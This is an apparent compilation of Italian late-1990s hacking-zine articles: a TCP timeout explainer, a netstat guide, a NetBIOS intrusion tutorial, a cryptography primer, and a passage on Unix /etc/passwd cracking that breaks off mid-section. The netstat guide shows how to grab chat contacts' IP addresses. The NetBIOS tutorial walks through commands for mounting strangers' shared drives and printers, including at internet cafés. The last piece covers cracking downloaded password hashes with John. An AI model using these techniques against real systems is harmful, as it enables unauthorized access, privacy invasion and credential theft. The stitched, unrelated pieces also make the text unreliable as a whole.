nel segmento di una conferma di ricezione valida. Dato infatti che il campo corrispondente esiste 
sempre e comunque nell’intestazione, se il segmento non trasporta alcuna conferma di ricezione è 
necessario informare in qualche modo il destinatario che tale campo va ignorato. Il terzo bit è posto a 
uno quando si vuole forzare la trasmissione dei dati all’utente finale indipendentemente dal fatto che il 


buffer di ricezione sia o meno completamente riempito. Il quarto segnalatore serve per interrompere 
immediatamente la connessione (reset). Tale evento avviene solo in situazioni eccezionali e causa 
l’interruzione immediata delle trasmissioni da ambo le parti e il rilascio del contenuto dei buffer di 
ricezione. Il quinto bit è detto di sincronizzazione, ed è utilizzato durante la fase iniziale di 
negoziazione della connessione, detta in gergo handshake. In pratica, i segmenti scambiati quando 
questo bit è impostato a uno servono a sincronizzare i numeri di sequenza delle due controparti prima 
d’iniziare la trasmissione vera e propria dei dati. L'ultimo bit serve a informare il destinatario che il 
mittente intende terminare in modo pulito la connessione e che non ha più dati da spedire. All’apertura 
e alla chiusura della connessione il TCP utilizza un algoritmo chiamato saluto a tre vie (three-way 
handshake) che garantisce la corretta sincronizzazione delle due operazioni. 

L’ultimo campo fisso è quello relativo alla soglia di capacità del mittente (window advertisement) che 
contiene il numero di ulteriori ottetti che esso è in grado di ricevere. A questo punto è di nuovo 
importante ricordare il concetto di piggybacking, a cui già si è accennato. Ovverosia, ogni segmento 
può portare contemporaneamente informazioni in cui una controparte è vista sia come chi spedisce i 
dati contenuti nel segmento, cioè come mittente, sia come chi ha ricevuto o deve ricevere dati dall’altro 
capo della connessione, cioè come destinatario. Quando noi parliamo di mittente, per evitare 
confusione, ci riferiamo sempre al mittente del segmento di cui stiamo parlando. È importante 
comunque tenere sempre presente che alcuni dati del segmento hanno senso solo se si considera il 
mittente quale destinatario di dati precedenti o ancora da venire. 

In fondo all’intestazione c’è un’area opzionale che può essere utilizzata a vari scopi. In genere essa 
contiene opzioni che permettono alle due controparti di negoziare alcuni aspetti della comunicazione. 
Un esempio è il calcolo della lunghezza ottimale del segmento. 

L’implementazione del protocollo TCP: Abbiamo visto che tutto il meccanismo funziona ed è 
affidabile grazie alle conferme di ricezione e alla ritrasmissione dei pacchetti probabilmente andati 
perduti. Ma come fa a sapere il mittente che un pacchetto è andato effettivamente perduto? Ovviamente 
perché non è arrivata la conferma di ricezione, direte voi. Va bene, ma quanto devo aspettare tale 
conferma prima di assumere che sia necessaria una ritrasmissione? E qui son dolori. Se aspetto troppo 
rischio di rallentare la comunicazione in modo inaccettabile. Se aspetto troppo poco rischio di 
ritrasmettere inutilmente troppi segmenti, magari semplicemente un po’ in ritardo. Tutto il sistema si 
basa sul calcolo del tempo di attesa massimo, o timeout. Il TCP calcola il timeout sulla base del tempo 
intercorso fra la spedizione di un segmento e l’arrivo della conferma corrispondente. Sembra facile, ma 
non è così. Vediamo rapidamente i punti chiave del discorso. 

Il TCP calcola continuamente il timeout, ogni volta che arriva una conferma di ricezione. In questo 
modo il sistema è sempre aggiornato in funzione dello stato effettivo della connessione e della rete. 

Il timeout è calcolato come media pesata dei tempi intercorsi fra la spedizione del segmento e la 
ricezione della conferma. Chiamiamo quest’ultimo tempo rilevato di andata e ritorno (Round Trip 
Sample) o RTS. Il tempo stimato di andata e ritorno (Round Trip Time) è calcolato utilizzando una 
specifica formula. In pratica ogni nuovo RTS pesa più o meno sul calcolo dell’RTT in base al valore di 
alfa. Se alfa è molto vicina a zero, l’RTT varia rapidamente a ogni cambiamento dell’ RTS, per cui il 
sistema risponde rapidamente alle variazioni. Se viceversa alfa è vicina a uno, è necessario che la 
nuova RTS rimanga stabile più a lungo per avere effetto sull’RTT. 


A questo punto il timeout viene calcolato moltiplicando 1’ RTT per un valore maggiore di uno. Se il 
valore di beta è troppo vicino a uno la perdita di un pacchetto viene immediatamente rilevata, ma si 
rischia di ritrasmettere più pacchetti del necessario. Se viceversa beta è troppo alto si rischia di 
aspettare troppo a lungo prima di ritrasmettere un pacchetto perso, abbassando così le prestazioni della 
connessione. In genere si raccomanda per beta un valore di due. 


Una scelta difficile: La scelta di alfa e di beta sembra dunque essere critica, ma i problemi non sono 
ancora finiti. Infatti, se un segmento è trasmesso due volte, quando arriva la conferma di ricezione, a 
chi si riferisce? Al pacchetto originale o a quello ritrasmesso? Se usiamo il primo pacchetto per il 
calcolo dell’RTS rischiamo di far crescere esponenzialmente il valore di timeout. Infatti un pacchetto è 
ritrasmesso quando scade il timeout precedente. Di conseguenza il nuovo RTS è ovviamente più grande 
del vecchio timeout. Se viene perso un nuovo pacchetto 1’ RTS cresce ancora, e così via. Se usiamo il 
pacchetto ritrasmesso abbiamo il problema opposto, cioè il timeout rischia di ridursi sempre di più, o 
almeno si è dimostrato sperimentalmente che si stabilizza su valori alquanto bassi. Supponiamo infatti 
di avere un ritardo in rete: la conferma di ricezione arriva conseguentemente in ritardo. Nel frattempo il 
mittente ha rispedito il pacchetto che credeva perso. Appena arriva la conferma questa è associata al 
segmento ritrasmesso generando così un RTS molto piccolo. Il timeout si riduce, aumentando il rischio 
di considerare persi pacchetti la cui conferma di ricezione arriva in ritardo, e così via. 

P. Karn propose nel 1987 d’ignorare i pacchetti ritrasmessi nel calcolo del timeout. Questo evitava il 
problema suddetto, ma ne creava un altro. Se un pacchetto è ritrasmesso perché si è avuto un repentino 
calo di prestazioni della rete, il timeout rimarrà sempre troppo basso, in quanto il mittente continuerà a 
ritrasmettere pacchetti le cui conferme arrivano in ritardo rispetto al timeout calcolato prima del calo di 
prestazioni. Dato che tali conferme vengono regolarmente ignorate per il calcolo dell’ RTT, il timeout 
non viene più aggiornato almeno fintanto che la rete non torna normale, cosa per giunta complicata dal 
sovraccarico dovuto all’inutile ritrasmissione dei pacchetti. La soluzione consiste nell’aumentare il 
timeout precedente a una ritrasmissione di un fattore arbitrario, diciamo gamma, fino a un limite 
massimo ragionevole calcolato sulla base dei possibili cammini all’interno della rete . In genere gamma 
non è minore di due. 

Questa tecnica è detta di backoff. 

Conclusione: Implementare il protocollo TCP non è certo banale. Il che tra l’altro fa capire come non 
tutti i pacchetti TCP siano uguali: anzi, è proprio il contrario. Una scelta oculata degli algoritmi 
implementativi può fare seriamente la differenza fra un prodotto e un altro. Il fatto che essi 
implementino lo stesso standard non dà alcuna indicazione sulla qualità delle prestazioni dello stack 
che state utilizzando. Se poi alcuni parametri possono essere personalizzati dall’utente, una opportuna 
calibrazione del programma studiata sulle caratteristiche specifiche della vostra rete, può modificare 
significativamente i tempi di risposta del sistema. Naturalmente non è fra gli scopi di questi articoli 
entrare nel dettaglio di tutte le problematiche TCP/IP. 
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Salve grazie per stare leggendo questo testo per imparare di più sull'uso di netstat affinchè ti sia di 
aiuto. 

Per favore non curarti di qualsiasi errore di ortografia, punteggiatura o grammaticale. 

Questo testo è scritto in modo che anche il lettore medio lo possa comprenderlo. 

Non per complicarlo. Per favore siate liberi di inviarmi email. 


- (Per aprire netstat) - Per aprire Netstat devi fare come segue: 

Clicca sul pulsante [avvio] --> poi clicca su [programmi] --> poi cerca [prompt di Ms-Dos]. 

Netstat è uno strumento davvero utile che ha molti usi. Io personalmente uso netstat per prendere gli 
indirizzi IP di altri utenti con cui sto parlando su ICQ o AIM. Puoi usare netstat anche per monitorare 
l'attività delle tue porte contro aggressori che inviano richieste di syn (parte del TCP/IP 3-way- 
handshake) o solo per vedere quali porte stanno in attesa/in collegamento. Guarda l'esempio sotto per 
una rappresentazione media di una risposta alla digitazione di [netstat] al prompt 'c:\' 


lattatiatia tia tTe0Ta®T Sia *Iatievia®Te®Ta®TeSTe via 0ie®Ta®Ta0TeviecIaViovi 


C:\WINDOWS>netstat 


Active Connections 


Proto Local Address Foreign Address State 

TCP pavilion:25872 WARLOCK:1045 ESTABLISHED 

TCP  pavilion:25872 sy-as-09-112.free.net.au:3925 ESTABLISHED 
TCP pavilion:31580 WARLOCK:1046 ESTABLISHED 


TCP pavilion:2980 205.188.2.9:5190 ESTABLISHED 
TCP  pavilion:3039 24.66.10.101.on.wave.home.com:1031 ESTABLISHED 


latta tiatia tia *Ie0Ta®Te0iatiatie0ia®Te®To0I vie *ia*ie*Ta®Ta®TetiecIe0io®i 


Adesso guarda sull'esempio. Vedrai [Proto] nell'angolo in alto a sinistra. 

Questo ti dice se il protocollo è TCP/UDP ecc. Affianco a destra vedrai [Local Address] questo ti dice 
le porte aperte dell'hostname/IP locale. 

Ancora più a destra vedrai [Foreign Address] questo ti darà l'IP/hostname della persona e la porta nel 
formato dell'IP: porta con ":" nel mezzo tra porta ed IP/hostname. 

E alla fine vedrai [state] che semplicemente dichiara lo stato della connessione. 

Questo può essere ESTABLISHED(stabilita) se si è connessi o LISTENING se si è in attesa di una 
connessione. 

Adesso con queste conoscenze ci tufferemo nel profondo di come usare questo comando per il 
monitoraggio dell'attività delle porte e la scoperta di porte aperte in uso. 


II. Individuazione delle porte aperte 


Adesso stai notando che qualcosa di buffo sta accadendo sul tuo computer? Lo sportellino del tuo 
lettore cd-rom sta diventando pazzo... aprendosi e chiudendosi benchè tu non faccia niente. E tu dirai 
che cazzo sta succedendo... oppure capirai che qualcuno si stia divertendo con un trojan sul tuo 


computer. 
Adesso il tuo obbiettivo è localizzare quale trojan sia per poterlo rimuovere giusto? Bene hai ragione. 
Allora vai al prompt di ms-dos. Ora ci sono molti modi di usare netstat e sotto c'è un menu di aiuto. 


Esaminalo. 


C:\WINDOWS>netstat -? 


Visualizza statistiche su protocollo e connessioni di rete TCP/IP correnti. 


NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [intervallo] 


-a Visualizza tutte le connessioni e le porte di ascolto. 

-e Visualizza le statistiche Ethernet. L'opzione può essere 
associata all'opzione -s. 

-n Visualizza gli indirizzi e i numeri di porta in forma numerica. 


-p proto Visualizza connessioni del protocollo specificato da 'proto'; 
‘proto' può essere TCP o UDP. Se usato con l'opzione -s per le 
statistiche, ‘proto' può essere TCP, UDP, o IP. 
T Visualizza la tabella di routing. 
-S Visualizza le statistiche per protocollo. Per impostazione 
predefinita, le statistiche sono visualizzate per TCP, UDP 
e IP; l'opzione -p può essere utilizzata per specificare 
un sottoinsieme dell'impostazione predefinita. 
intervallo Rivisualizza le statistiche selezionate, interrompendo 
per un numero di secondi pari a "intervallo" tra ogni 
visualizzazione. Premere CTRL+C per fermare la visualizzazione 
delle statistiche. Se omesso, netstat stamperà le informazioni 
di configurazione correnti una sola volta. 
To personalmente preferisco usare (c:\windows\netstat -an) che mostra tutte le connessioni e le porte 
aperte nella forma dell'IP invece che dell'hostname. Così come puoi notare come abbia usato il 
comando: netstat -a(mostra tutte le connessioni e le porte in attesa.)n(in formato numerico(IP)) 
nestat -an -così facendo vengono eseguite le due opzioni alla volta senza bisogno di dover scrivere -a-n. 
Adesso che sai come usare netstat per per vedere tutte le tue connessioni e le porte in attesa puoi 
ricercare porte comuni come 12345 (vecchio trojan netbus), 1243(vecchio subseven) ecc.. questo 
diventa molto utile per ogni cosa che scoprirai. 
Prenditi una pausa adesso e datti una calmata sul tuo divano e rilassati per circa 5 minuti e lascia tutto 
questa sudata per il ritorno pronto ad imparare di più. :) 


Quando senti SYN e ACK(ACKnowledge) tu non pensi alla comunicazione dei pacchetti sul tuo 
sistema. 


Bene, lasciami dire cosa fanno SYN e ACK. 


[SYN] - SYN in parole comuni è una richiesta per una connessione usata nell'handshake 3-way nel 
TCP/IP. Quando tu mandi una SYN per una connessione, il computer obbiettivo risponderà con una 
SYN o una ACK. Così principalmente quando vedi nella colonna [state] SYN significa che stai 
mandando una richiesta per connetterti a qualche cosa. 


[ACK] - Adesso l'ACK è la conferma di ricevuta alla richiesta fatta da un computer che sta provando a 
connettersi con te. Una volta che una SYN ti è stata mandata tu devi rispondere con un ACK, poi 
mandare indietro un altra SYN al computer che richiede la connessione per confermare che il pacchetto 
inviato era corretto. 

Spero di averti aiutato a capire un pò di più SYN e ACK. Se hai ulteriori domande prova a cercare testi 
sul TCP/IP. 

Adesso andiamo nelle cose divertenti. 


Avete mai provato a prendere qualche indirizzo IP o hostname usando [AIM] o [ICQ]? Bene siete 
fortunati. 


[AIM] - Con AIM non puoi generalmente trovare l'esatto indirizzo IP senza alcune prove e errori 
poichè la maggior parte del tempo sembra collegare tutti gli utenti online sulla porta 5190. Così meno 
utenti sono online più è facile. Allora, vai al prompt di ms-dos e digita netstat -n lì, vedrai sotto 
[Foreign Addressess] un IP:con la porta 5190. Adesso uno di quegli IP che è connesso con te sulla 
porta 5190 diventerà il tuo utente bersaglio su AIM. Solo prove e errori per cercare sono generalmente 
il metodo più facile. 


[ICQ] - per prendere un IP di un utente di ICQ usando netstat è facile. PRima di di parlare con la 
persona su ICQ devi aprire il prompt di ms-dos e fare il netstat -n per vedere tutti gli IP e le porte. 
Prendi nota o copiali da qualche parte così che li possa ricordare in seguito. Adesso è il momento di 
trovare questo IP. Manda un messaggio all'utente con un singolo messaggio e adesso velocemente fai 
netstat -n. Avrai una nuova linea aggiunta di un indirizzo IP, adesso cerca per quello nuovo nella 
colonna [Foreign Addressess] e una volta che l'avrai trovato hai l'ip del tuo amico senza patch o 
hackeraggi. Semplice abilità :P. 


Netstat può essere usato per prendere gli IP di ogni cosa e ognuno, ogni volta che c'è una connessione 
diretta tra te e il bersaglio (es. messaggi diretti, trasferimenti di files o chat ICQ su ICQ, chat DCC 
(Direct Client Connection) o chat e trasferimenti di files su irc ecc..). 


Port scanning: per cercare una qualsiasi porta aperta su un computer: 
- [7th Sphere Port scanner] - (2 siti mirror nel caso che un link non funzionasse) 


- http://members.xoom.com/Cryptog/7spereportscan.exe 
- http://members.xoom.com/gohan_3/7spereportscan.exe 
Firewall per monitorare porte e il registro: 
- [Lockdown 2000] 
- http://www.lockdown.com 
Per comunicare meglio: 
- ICQ] 
- http://www.icq.com 
- [Aol Instant Messanger] 
- http://www.aol.com 


Netstat con interfaccia grafica: 
- [X-netstat] 
- http://spazioweb.inwind.it/m3xican/pagine/download/vari.htm 


a. Alcune volte netstat può generare liste molto lunghe, che sono specialmente confuse per i newbies. 
Se tu stai avendo difficoltà, esegui solo netstat, e poi fai una connessione diretta di qualsiasi genere col 
tuo bersaglio , o fallo connettere a te (ICQ, IRC, ecc.. ti sei fatto un idea) ed esegui netstat ancora. Ci 
dovrebbe essere una nuova linea, questo è quello che stai cercando. 


b. Se l'output di netstat è troppo lungo, digita 'netstat -an > c:\directory\file.txt' (senza le virgolette, e 
puoi rimpiazzare i parmetri -an e il nome del file e il suo percorso con qualsiasi cosa tu voglia). Questo 
scaricherà l'output su quel file per una lettura semplice, e ti permetterà anche di eseguire un copia & 
incolla. 


Io penso che sia una cosa migliore comprendere internet che usare degli strumenti che trovi. 
Impara come fare le cose manualmente così comprenderai completamente cosa sta accadendo. Questo 
alimenterà il tuo potere e ucciderà la tua debolezza :) 


-Tricker 


Questa guida è stata tradotta dal M3xican ( m3xican@napolihak.cjb.net ), 
se considerate la traduzione scadente o vi volete 

cimentare nell'impresa potete scaricare la versione originale 

in inglese sempre su <http://napolihak.cjb.net>. 


Gli 08-10-1998 
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COME INTROMETTERSI IN SISTEMI 95 O NT via tcp/ip, SFRUTTANDO IL COMANDO 
NBISTAT DI WINDOWS 95. 


Affinchè tutto funzioni bisogna avere tra i nostri componenti della rete 

il CLIENT PER RETI MICROSOFT e tra le impostazioni di quest'ultimo bisogna 
abilitare la "CONNESSIONE RAPIDA". 

Nella Connessione al provider dobbiamo anche attivare la casella di 

"Accedi alla rete". 


Innanzitutto occorre che i PC nei quali vogliamo entrare, abbiano il 

NETBIOS attivo sul protocollo TCP/IP. Per sapere cio' basta andare in un 
prompt di MS-Dos ed eseguire il comando NBTSTAT -A xxx.xxx.xxx.xxx (-A 
maiuscolo; xxx.xxx.xxx.xxx = numero ip della macchina su cui verificare se 

il NETBIOS è o meno attivo). (1) 


Ora abbiamo due possibilità: 

A) NETBIOS non è attivo sulla macchina remota e quindi non è possibile 
entrarci :( 

In questo caso l'output del comando NETSTAT -A xxx.xxx.xxx.xxx sarà: Host 
not found. 


B) NETBIOS è attivo e allora possiamo andare avanti. In questo caso 
l'output sarà qualcosa del genere: 


Name Type Status 
SERVER <00> UNIQUE Registered 
MEDIA SPAZIO <00> GROUP Registered 
SERVER <03> UNIQUE Registered 
SERVER <20> UNIQUE Registered 
MEDIA SPAZIO <1E> GROUP Registered 


*potrebbero esserci anche altre voci...... ma questo non ci 


interessa...... 


Se abbiamo trovato una macchina con il netbios attivo andiamo nella nostra 
directory \windows (o se avete installato windows in un'altra 

directory....in quella dove è installato) e cerchiamo il file Lmhosts. Se 

non è presente lo creeremo con il notepad. Ricordatevi di togliere 
l'eventuale estensione .txt quando lo salverete.... 


Attenzione: solitamente è presente un file chiamato Lmhosts.sam; è un 
esempio di come si fà il file Lmhosts.....ma non ce ne fotte nulla :))) 


Editiamo quindi il file Lmhosts in questo modo: 
XXX.XXX.XXX.XXxX <tab> Nome della macchina <tab> #PRE 


Il nome della macchina è il primo che troviamo con il comando NETSTAT -A 
XXX.XXX.XXX.XXxX; nel caso portato ad esempio è SERVER 


mettiamo che l'ip della macchina di cui sopra sia 194.210.123.11, 
scriveremo: 


194.210.123.11 SERVER #PRE 
usate la tabulazione per staccare le tre parti. 


Salvate nella directory di windows e ricordatevi di togliere l'eventuale 
estensione .txt 


Ora torniamo in Prompt di MSDos e scriviamo 
NBISTAT -R 


dovremmo ricevere un messaggio di conferma 

Successful purge and preload of the NBT Remote Cache Name Table. 
altrimenti qualcosa non è andato bene.....probabilmente avete sbagliato 
qualcosa :) 


Ora dobbiamo solo sperare che il PC abbia delle risorse condivise: 
Dischi.....Stampanti.... 


Per saperlo scriviamo: net view \\Nome della macchina 
nel nostro esempio : net view \\SERVER 


se condivide qualcosa avremo l'elenco delle risorse condivise...una cosa 
del genere: 
Condivisione Tipo Commento 


COLORI Stampa 
DISCO SERVER Disco 
RICOH-LASER Stampa 
Esecuzione comando riuscita. 


Se non condivide nulla possiamo anche cambiare obiettivo :( 
La macchina in questione condivide due stampanti ed un disco. 


Per condividere il disco andiamo in Risorse del Computer....e clicchiamo 
sulla barra degli strumenti (se non l'avete ancora attivata...che 
aspettate?!?!) sull'icona "Connetti unità di rete"; apparirà una finestra 
con UNITA' e PERCORSO. 

Lasciamo l'unità a quella che è, e digitiamo nel percorso cio' che segue: 


\\Nome della macchina\nome condivisione 
quindi nel nostro caso 
\\SERVER\DISCO SERVER (sempre rispettando maiuscole e minuscole) 


A questo punto verrà creata un'icona con la condivisione e cliccandoci 
sopra entreremo nel disco del computer remoto. Potremo sfogliarlo, copiare 
e nel caso non sia Read-only....scriverci. 


E' anche possibile condividere una stampante; per fare cio' andiamo nella 
cartella stampanti, clicchiamo aggiungi stampante, scegliamo STAMPANTE DI 
RETE, digitiamo il percorso della stampante....ad esempio nel nostro caso 
potrebbe essere \\SERVER\COLORI o \\SERVER\RICHO-LASER, 

scegliamo di non stampare la pagina di prova (per non rovinare l'effetto 
sorpresa) e confermiamo il tutto. 

A questo punto il PC scaricherà i drivers direttamente dal PC 
REMOTO........potrebbero volerci una decina di minuti, e il pc sembrerà 
bloccato......... ma non lo è; attendete pazientemente e quando avrà 
finito.....potrete scrivere un bel file con il msg: 


HACKERATI,SIETE STATI HACKERATI, SIETE STATI HACKERATI,SIETE STATI 
HACKERATI,SIETE STATI HACKERATI,SIETE STATI HACKERATI,SIETE STATI 
HACKERATI,SIETE STATI HACKERATI,SIETE STATI HACKERATI,SIETE STATI 
HACKERATI,SIETE STATI HACKERATI,SIETE STATI HACKERATI,SIETE STATI 
HACKERATI,SIETE STATI HACKERATI, SIETE STATI HACKERATI,SIETE STATI 
HACKERATI,SIETE STATI HACKERATI, SIETE STATI HACKERATI,SIETE STATI 
HACKERATI,SIETE STATI HACKERATI,SIETE STATI HACKERATI,SIETE STATI 
HACKERATI,SIETE STATI HACKERATI,SIETE STATI HACKERATI,SIETE STATI 


o quello che volete :))) e stamparlo sulla stampante remota.....immaginate 
la sorpresa:) 


So che è difficile che le condizioni affichè cio' funzioni si verifichino 
tutte insieme......ma 

con il programmino apposito (1).....sarebbe tutto abbastanza piu' 
semplice.....e cmq....provate sugli intenet cafe'...ad esempio; io ieri ne 


(1) sarebbe utile a tal fine un programma che esegua NBTSTAT -A su un 
range di ip. E qui un'appello ai programmatori del SOFT PROJECT; se avete 
voglia e tempo....non sarebbe male..... con un po' d'impegno potrei farlo 

pure io......ma non verrebbe sicuramente altrettanto bene :)) 


PS. Un saluto a tutti quelli di #hackers.it (IRCNET) e a tutti i 
componenti del SOFT PROJECT..... con i quali mi scuso per non aver potuto 
portare avanti il progetto iniziato. 


PsPs.: se ti manca il file vnbt.386 (causa protect winnuke 00B) che 
controlla il netbios non funge niente e devi provvedere!!! 


PsPsPs.: se ti rompi di fare tutto cio' vai su www.volftp.tin.it e sulla 
casella search metti msdun 

sarebbe un aggiornamento di accesso remoto (in inglese) che ti permettera' 
di accedere a un computer 

mettendo semplicemente l'ip numerico della persona in trova computer che 
sta nel menu avvio (trova) 


Comunicare a un'altra persona delle informazioni e' un passaggio necessario 
per far progredire idee e concetti... qualche volta pero' e' anche altrettanto 
necessario evitare che altri ascoltino quello che abbiamo da dire... 

Giulio Cesare, per esempio, garantiva la riservatezza dei suoi ordini 
scambiando le lettere dell'alfabeto fra di loro secondo uno schema che solo i 
suoi sotto ufficiali conoscevano... un metodo banale ma efficace se si pensa 
che a quel tempo la sola scrittura era gia' un modo per comunicare messaggi 
incomprensibili alla maggior parte delle persone... 

Un codice di questo tipo oggi farebbe ridere, in pochi minuti un programma 

di ricerca statistica, tarato con le cadenze delle lettere in una particolare 
lingua, decifrerebbe il messaggio in pochi minuti, anche presupponendo che chi 
ha criptato i dati abbia usato un complicatissimo algoritmo per scambiare le 
lettere. 

Facciamo finta che io debba inviare a un mio amico un'informazione 

segreta. Sicuramente questa verra' intercettata da un eventuale nemico che 
dispone di sofisticati metodi di calcolo...come posso fare per evitare che ne 
comprenda il significato ? 


Primo caso: il mio amico viene a trovarmi a casa una sera, siamo sicuri di 
non essere spiati e ci accordiamo su un modo per codificare il messaggio. 

Il sistema in questione viene generalmente chiamato "a chiave privata" ovvero 
il mittente e il destinatario sono i soli a sapere come decriptare il 

codice e, finche questo rimane segreto, possiamo considerarlo sicuro. 

Questo modo di procedere ha pero' dei limiti: il primo e' che la chiave puo' 
essere difficilmente aggiornata, poiche', quando questo accade, bisogna avere 
la certezza di non essere ascoltati....piu' tempo la chiave resta attiva, 
maggiori saranno le probabilita' che il nemico la scopra...Se poi si ha la 
necessita' che un messaggio venga compreso da di piu' persone tutte in 
possesso della stessa chiave, aumenta notevolmente la possibilita' che 

il nemico possa intercettarla e compromettere la sicurezza... 

Un esempio di questo tipo di codifica e' dato dall' americano DES ovvero 

Data Encryption Standard, la cui chiave base e' un numero di 56 cifre in formato 
binario, ovvero 2/56 possibilita' differenti di interpretare il messaggio. 

Si puo' pensare che un numero cosi' grande assicuri una sicurezza assoluta, 
ma, viste le capacita' di calcolo dei moderni super computer e la potenza dei 
nuovi algoritmi, si e' ben lontani dal poter affermare l'impossibilita' di 
decryptazione da parte di estranei (vedi seconda parte dell'articolo)... 


Secondo caso: io e il mio amico non possiamo incontrarci, anzi siamo 
costretti a scambiare messaggi con la certezza che questi vengono 
intercettati..non possiamo inviarci dunque chiavi segrete, come facciamo a 
rendere sicura una conversazione ? 

Nel 1975 Whitfield Diffie e Martin Hellman inventarono un nuovo sistema per 
codificare informazioni: la "crittografia a chiave pubblica"... il concetto di 
base e' semplice: io ho due chiavi, una pubblica e una privata, se qualcuno 
vuole inviarmi un messaggio prende la mia chiave pubblica e lo crypta, 

a questo punto il solo che potra' decryptarlo sono io con la mia 

chiave privata... Matematicamente questo processo e' possibile utilizzando la 
teoria dei numeri primi: dati 2 numeri primi molto grandi e' facile ottenere 
il loro prodotto, mentre e' quasi impossibile risalire dal prodotto ai due 
numeri originali...in questo modo se io utilizzo i due numeri primi come 
chiave segreta e come chiave pubblica il prodotto, ottengo un sistema che mi 
garantisce sicurezza senza la necessita' di inviare la chiave al 
destinatario... e' questa l'idea alla base del metodo piu' diffuso oggi 

di codifica, l'RSA, nome derivato dalle iniziali degli ideatori 
Rivest-Shamir-Adleman del MIT. Una applicazione nota e' il famoso 

PGP di Philip Zimmermann, programma disponibile un po' ovunque sulla rete, 
che e' grado di garantire una sicurezza quasi assoluta...o almeno cosi' si 


ritiene... 

Infatti fino al 1982 i migliori sistemi di decodifica RSA erano in grado di 
decifrare un codice di 50 cifre in forma decimale per cui bastava usare 
chiavi pubbliche di 100 cifre per stare al sicuro..poi lo sviluppo della 
potenza di calcolo e degli algoritmi ha permesso di arrivare dapprima alla 
scomposizione di numeri di 60-70 cifre, e oggi a quelli di 90-100..e questi 
sono dati che non tengono conto delle novita', come il computer da uno 
migliaio (non ricordo il numero esatto ma erano davvero tanti) di 

Pentium Pro 200 Mhz in parallelo comprato dal governo americano... 

...Se venisse dedicato solo alla decifrazione di codici non so cosa 
potrebbe combinare....questo per quanto riguarda il calcolo puro, perche' 
se si considera l'aspetto teorico del problema si scopre che alcuni 
concetti matematici (noti gia' al tempo di Fermat) dicono che se un PC e' 
in grado di generare un numero di circa 300 cifre partendo da 2 numeri primi 
di 150 (questa e' infatti la dimensione della chiave pubblica si imposta il 
PGP in modalita' "sicurezza militare" ovvero crea un numero di 1024 bits) 
con la stessa potenza di calcolo deve essere possibile risalire ai 2 numeri 


di partenza... dunque tutti i dati che girano sulla rete criptati con l'RSA 
contano sul fatto che questo metodo previsto in linea teorica non venga mai 
scoperto dai matematici....se naturalmente non e' stato gia' scoperto ;).... 


Ve la cavate in matematica e volete fare uno svracco di soldi subito ? 
Facile: inventate un nuovo algoritmo di scomposizione in numeri primi e 
vendetelo al migliore offerente, ma dopo cominciate a rinunciare all'idea 
di poter inviare un messaggio riservato a qualcuno o di tenere segreto 

il vostro conto in banca.... 


Passiamo alla pratica - il file passwd 


Il file piu' importante per la sicurezza dei sistemi Unix e' /etc/passwd. 
In questo file infatti sono memorizzati gli account di tutti gli utenti 
che hanno accesso al sistema, ovvero il paradiso per chi 

sta cercando un modo per entrare in quel computer... 

Il file passwd si presenta come una lista di stringhe di testo strutturate 
nel modo seguente: 


username :password:userID:groupIb:nome: homedirectory:shell 
un esempio possono essere i seguenti: 


root:xHPq.1DeS9nTD2:0:0:root:/:/bin/sh 
bin:*:1:1:bin:/bin: 
daemon:*:2:2:daemon:/sbin: 
adm:*:3:4:adm:/var/adm: 
lp:*:4:7:1lp:/var/spool/1lpd: 
sync:*:5:0:sync:/sbin:/bin/sync 
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown 
halt:*:7:0:halt:/sbin:/sbin/halt 
mail:*:8:12:mail:/var/spool/mail: 

demo ::101:100:demo:/usr/demo:/usr/sh 
quirk:mV.ZNxmPykSek:578:12:Mr Quirk:/usr/quirk:/bin/sh 


Analizziamo questi diversi tipi di account.. 


Lo username e' il nome che si inserisce quando viene richiesto il login 

ed e' la parola con cui verrai identificato quando sei all'interno del 
sistema... il primo username che compare in un file di passwd e' solitamente 
"root" ovvero l'operatore di sistema, colui che ha tutti i privilegi e puo' 


fare qualsiasi cosa sulla macchina.. non mi dilungo sulle conseguenze che 

puo' avere riuscire ad entrare in un sistema attraverso l'account root...:> 

Il secondo campo della stringa di account e' proprio la password del rispettivo 
user. Si possono incontrare diversi casi: 


1) La password non e' dichiarata...(vedi account "demo" nell'esempio") 
..Ovviamente e' il caso migliore, ma, 

trascurando l'eventualita' di operatori sfigati, o non ne troverete o vi 
consentiranno un accesso ristretto al minimo, praticamente inutilizzabile 
(a meno che non siate degli sboroni e utilizzate questi account per 
inserire cavalli di troia nel sistema e guadagnare cosi' i privilegi 

di un OP ).. 


2) La password e' un carattere "*" (account "bin, daemon")... 
..qui c'e' poco da dire, questo tipo di acconut e' disabilitato per gli utenti e 
viene utilizzato da sistema per gestire diversi tipi di servizi 


3) La password e' una serie di caratteri sconnessi (account "root" e "quirk") 
..in questo caso siamo davanti a una password criptata con il sistema DES 
e possiamo lavorarci sopra... 


Se vi capita di scaricare un simile file passwd... 


root:x:0:0:root:/root:/bin/bash 
bin:x:1:1:bin:/bin: 
daemon:x:2:2:daemon:/sbin: 
adm:x:3:4:adm:/var/adm: 
lp:ix:4:7:1lp:/var/spool/1lpd: 
sync:x:5:0:sync:/sbin:/bin/sync 
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown 
halt:x:7:0:halt:/sbin:/sbin/halt 
mail:x:8:12:mail:/var/spool/mail: 
news:x:9:13:news:/usr/lib/news: 
uUucp:x:10:14:uucp:/var/spool/uucppublic: 
operator:x:11:0:operator:/root:/bin/bash 
games:x:12:100:games:/usr/games: 
man:x:13:15:man:/usr/man 


..Cominciate a imprecare, infatti il file in questione e' di tipo Shadowed, 
ovvero tutte le passwd sono contenute in un altro file "shadow" che 
l'amministratore puo' nascondere ovunque nel server... ovviamente non sto 

a precisare quanto sia utile il solo file passwd con tutti gli account di questo 
tipo.. (una cosa che proprio non so e' se possono esistere password file con 

una parte di account normali e una parte shadow... non ne ho mai visti, ma 

non posso escluderne la presenza... ) 


Mettiamo che in qualche modo siate riusciti a scaricare il file di passwd 

da un server... il primo passo da fare e' controllare che non ci siano 
account con accesso libero, se siete fortunati, ma molto fortunati, potete 
anche tralasciare le prossime righe... se la ricerca, come nella maggior 
parte dei casi, non da i frutti sperati allora bisogna munirsi di un buon 
programma di decriptazione. L'ultimo in mio possesso si chiama John v1.0 
creato nel 1996 ed e' molto piu' veloce dei suoi predecessori piu' famosi come 
Brute o CrackerJack.. 

Il suo funzionamento e' semplice: cripta una serie di parole con il sistema 
DES e controlla se il risultato e' uguale a quello scritto nel file passwd. 
